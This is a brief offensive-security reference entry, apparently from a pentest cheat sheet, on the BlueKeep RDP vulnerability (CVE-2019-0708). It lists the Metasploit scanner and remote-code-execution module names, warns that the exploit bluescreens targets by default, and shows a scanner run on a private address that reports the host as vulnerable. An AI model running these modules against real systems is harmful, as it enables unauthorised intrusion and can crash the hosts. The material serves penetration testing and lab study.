CVE

CVE-2019-0708 - BlueKeep RDP Remote Windows Kernel Use After Free

The exploit will cause bluescreen by default.

Scanner

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Exploit

msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Examples

Scanner example

msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 10.10.10.16
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run

[+] 10.10.10.16:3389      - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 10.10.10.16:3389      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

URL list